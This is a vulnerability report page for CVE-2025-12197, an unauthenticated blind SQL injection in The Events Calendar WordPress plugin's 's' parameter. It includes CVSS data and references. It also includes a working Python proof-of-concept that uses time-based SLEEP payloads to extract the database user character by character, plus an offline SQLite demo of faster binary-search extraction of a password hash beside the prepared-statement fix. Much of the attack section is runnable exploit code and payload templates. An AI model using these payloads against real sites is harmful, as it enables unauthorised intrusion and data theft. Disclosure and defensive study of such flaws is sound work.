Security Vulnerability Report
CVE-2025-12197 CVSS 7.5 HIGH

CVE-2025-12197

Published: 2025-11-05 05:15:52
Last Modified: 2026-04-15 00:35:42

Description

The Events Calendar plugin for WordPress is vulnerable to blind SQL injection via the 's' parameter in versions 6.15.1.1 to 6.15.9. The user-supplied value is not sufficiently escaped and the existing SQL query is not prepared, so an unauthenticated attacker can append additional SQL conditions to an existing query and use the resulting true/false (or timing) behaviour to extract sensitive information from the database. Weakness class: CWE-89 (SQL Injection).

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

The Events Calendar plugin >= 6.15.1.1 and < 6.15.9. Note that the description above gives the affected range as 6.15.1.1 to 6.15.9, so confirm the exact first fixed release against the plugin changeset listed in the references before treating 6.15.9 as patched.

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-12197 PoC - The Events Calendar SQL Injection
# Target: WordPress with The Events Calendar plugin (versions 6.15.1.1 - 6.15.9)
# Vulnerability: Blind SQL Injection via 's' parameter
import requests
import time

target_url = "http://target-site.com/"

# Time-based blind oracle: send one payload in the 's' parameter and report
# whether the response was delayed by the injected SLEEP(5).
# The threshold is a bare 5 s, so a slow or overloaded target produces
# false positives; measure a baseline request first and adjust.
def exploit_blind_sql(payload):
    params = {'s': payload}
    start_time = time.time()
    response = requests.get(target_url, params=params, timeout=30)
    elapsed = time.time() - start_time
    return elapsed > 5  # True if SLEEP(5) was executed

# Example payload to extract the database user (MySQL user()).
# Compares the character at position {} against ASCII code {} and sleeps on a match.
# The leading quote and trailing AND '1'='1 assume the value lands inside a
# single-quoted string literal; adjust to the real query context if it differs.
payload_template = "' AND (SELECT CASE WHEN (ASCII(SUBSTRING((SELECT user()),{},1))={}) THEN SLEEP(5) ELSE 0 END) AND '1'='1"

def extract_data():
    extracted = ""
    charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789@_."
    for pos in range(1, 50):  # Max length check
        for char in charset:
            payload = payload_template.format(pos, ord(char))
            if exploit_blind_sql(payload):
                extracted += char
                print(f"Extracted: {extracted}")
                break
        else:
            # No character in the charset matched at this position: either the
            # end of the string or a character outside the charset, so stop.
            break
    return extracted

# Boolean-based injection alternative
def exploit_boolean_sql(injection):
    params = {'s': f"' AND {injection} AND '1'='1"}
    response = requests.get(target_url, params=params, timeout=30)
    return len(response.text) > 0  # Adjust based on target behavior

if __name__ == "__main__":
    print("CVE-2025-12197 - The Events Calendar SQL Injection PoC")
    print("Target:", target_url)
    print("Starting blind SQL injection attack...")
    print("Extracted value:", extract_data())
```
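The following is an added, self-contained example (not the plugin's code and not the PoC above) that shows both halves of the description: the unescaped, unprepared query pattern the advisory describes, the prepared form that fixes it, and the character-by-character blind extraction that the PoC performs over the network. SQLite stands in for MySQL so it runs offline, which means the oracle is boolean-based (SQLite has no SLEEP()) rather than time-based; the `posts` and `users` tables, the `LIKE '%...%'` query shape, and the `'1%'='1` suffix that fits that shape are all constructed for this demo and are not documented on this page as the plugin's real query context.

```python
import sqlite3


def build_db():
    """Constructed sample database for the demo (not the plugin's real schema).

    `posts` stands in for the table the search runs against; `users` holds
    the "sensitive information" a blind injection would pull out.
    """
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE posts (id INTEGER PRIMARY KEY, title TEXT);
        CREATE TABLE users (id INTEGER PRIMARY KEY, login TEXT, pass_hash TEXT);
        INSERT INTO posts VALUES (1, 'Spring Festival'), (2, 'Summer Gala');
        INSERT INTO users VALUES (1, 'admin', '$P$Bexample');
    """)
    return con


def search_vulnerable(con, s):
    """The bug class from the advisory: the 's' value is spliced into the SQL
    text with no escaping and no prepared statement."""
    sql = "SELECT id, title FROM posts WHERE title LIKE '%" + s + "%'"
    return con.execute(sql).fetchall()


def search_prepared(con, s):
    """Hardened form: the value is bound as a parameter, so the engine never
    parses it as SQL (the role $wpdb->prepare() plays in WordPress code)."""
    sql = "SELECT id, title FROM posts WHERE title LIKE '%' || ? || '%'"
    return con.execute(sql, (s,)).fetchall()


def oracle(search, con, condition):
    """Boolean oracle: close the LIKE literal, AND in the attacker's condition,
    then re-open a literal so the query's trailing %' still parses.
    Rows come back only when `condition` is true."""
    payload = "%' AND (" + condition + ") AND '1%'='1"
    try:
        return len(search(con, payload)) > 0
    except sqlite3.Error:
        return False


def extract(search, con, expr, max_len=32):
    """Recover the string value of SQL expression `expr` one character at a
    time, binary-searching each code point (7 oracle queries per character
    instead of one query per candidate character as in a charset scan)."""
    out = ""
    for pos in range(1, max_len + 1):
        if not oracle(search, con, f"length({expr}) >= {pos}"):
            break  # past the end of the string
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(search, con, f"unicode(substr({expr},{pos},1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        out += chr(lo)
    return out


if __name__ == "__main__":
    target = "(SELECT pass_hash FROM users WHERE id = 1)"
    con = build_db()
    print("vulnerable:", repr(extract(search_vulnerable, con, target)))
    print("prepared:  ", repr(extract(search_prepared, con, target)))
```

Against `search_vulnerable` the loop recovers the stored hash character by character; against `search_prepared` the same payload is just a search string that matches no title, so the oracle never returns true and nothing is extracted. The binary-search step is why real blind-injection tooling is much faster than the charset scan in the PoC above: about 7 requests per character versus up to 66.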

References

https://plugins.trac.wordpress.org/changeset/3386042/the-events-calendar (WordPress plugin changeset)
https://www.wordfence.com/threat-intel/vulnerabilities/id/bc927a93-0cb2-4211-9f93-c0671039011e?source=cve (Wordfence advisory)

Raw JSON Data

```json
{"cve": {"id": "CVE-2025-12197", "sourceIdentifier": "security@wordfence.com", "published": "2025-11-05T05:15:51.590", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The The Events Calendar plugin for WordPress is vulnerable to blind SQL Injection via the 's' parameter in versions 6.15.1.1 to 6.15.9 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database."}], "metrics": {"cvssMetricV31": [{"source": "security@wordfence.com", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "security@wordfence.com", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/changeset/3386042/the-events-calendar", "source": "security@wordfence.com"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/bc927a93-0cb2-4211-9f93-c0671039011e?source=cve", "source": "security@wordfence.com"}]}}
```